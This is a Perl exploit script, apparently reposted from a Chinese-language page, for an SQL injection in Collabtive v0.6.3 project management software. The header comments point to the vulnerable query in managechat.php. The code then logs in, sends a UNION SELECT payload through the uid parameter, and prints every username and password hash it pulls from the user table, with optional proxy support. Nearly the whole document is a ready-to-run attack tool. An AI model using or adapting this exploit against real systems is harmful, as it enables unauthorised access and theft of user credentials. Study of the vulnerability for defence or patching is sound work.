扫码分享
验证:
体验盒子#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use HTTP::Cookies;
use Getopt::Long;
# \#'#/
# (-.-)
#------------------oOO---(_)---OOo-----------------
#|__ __ |
#|_____/ /_____ ______/ /_________ ______ |
#| / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
#|(__) /_/ /_/ / // /_/ / /_/ / /_/ (__)|
#| /____/\__/\__,_/_//_.___/\__,_/\__, /____/ |
#| Security Research Division/____/ 2o1o|
#--------------------------------------------------
#| Collabtive v0.6.3 Multiple Vulnerabilities |
#--------------------------------------------------
# [!] Discovered by.: DNX
# [!] Homepage......: http://starbugs.host.sk
# [!] Vendor........: http://collabtive.o-dyn.de
# [!] Detected......: 04.06.2010
# [!] Reported......: 05.06.2010
# [!] Response......: xx.xx.2010
#
# [!] Background....: Collabtive ist eine web-basierte Projektmanagementsoftware.
# Das Projekt startete im November 2007. Es ist eine
# Open-Source-Software und stellt eine Alternative zu proprietären
# Werkzeugen wie Basecamp dar. Collabtive ist in PHP geschrieben.
#
# Collabtive wird von einem professionellen Team entwickelt.
#
# [!] Requirements..: Account needed
#
# [!] Bug...........: $_GET['uid'] in managechat.php near line 64
#
# 12: $userto_id = getArrayVal($_GET, "uid");
#
# 64: $sel = mysql_query("SELECT * FROM chat WHERE ufrom_id IN($userid,$userto_id) AND userto_id IN($userid,$userto_id) AND time > $start ORDER by time ASC");
#
# The password is encoded with sha1.
#
# [!] Bug...........: The arbitrary file upload discovered by USH is still present.
# See http://www.milw0rm.com/exploits/7076 more details.
#
if(!$ARGV[5])
{
print "\n \\#'#/ ";
print "\n (-.-)";
print "\n ---------------oOO---(_)---OOo---------------";
print "\n |Collabtive v0.6.3 SQL Injection Exploit|";
print "\n | coded by DNX|";
print "\n ---------------------------------------------";
print "\n[!] Usage: perl collabtive.pl [Host] [Path] <Options>";
print "\n[!] Example: perl collabtive.pl 127.0.0.1 /collabtive/ -user test -pass 12345";
print "\n[!] Options:";
print "\n -user [text]Username";
print "\n -pass [text]Password";
print "\n -p [ip:port]Proxy support";
print "\n";
exit;
}
my %options = ();
GetOptions(\%options, "user=s", "pass=s", "p=s");
my $ua= LWP::UserAgent->new();
my $cookie= HTTP::Cookies->new();
my $host= $ARGV[0];
my $path= $ARGV[1];
my $target= "http://".$host.$path;
my $user= "";
my $pass= "";
if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }
if($options{"user"}) { $user = $options{"user"}; }
if($options{"pass"}) { $pass = $options{"pass"}; }
print "[!] Exploiting...\n\n";
exploit();
print "\n[!] Done\n";
sub exploit
{
##############
# make login #
##############
my $url = $target."manageuser.php?action=login";
my $res = $ua->post($url, [username => $user, pass => $pass]);
$cookie->extract_cookies($res);
$ua->cookie_jar($cookie);
############################
# get users with passwords #
############################
$url = $target."managechat.php?action=pull&uid=0) union select 1,2,name,4,5,6,pass from user/*";
$res = $ua->get($url);
my $content = $res->content;
my @c = split(/<br \/>/, $content);
foreach (@c)
{
if($_ =~ /<b>(.*?):<\/b> (.*)/)
{
print $1.":".$2."\n";
}
}
}
体验盒子
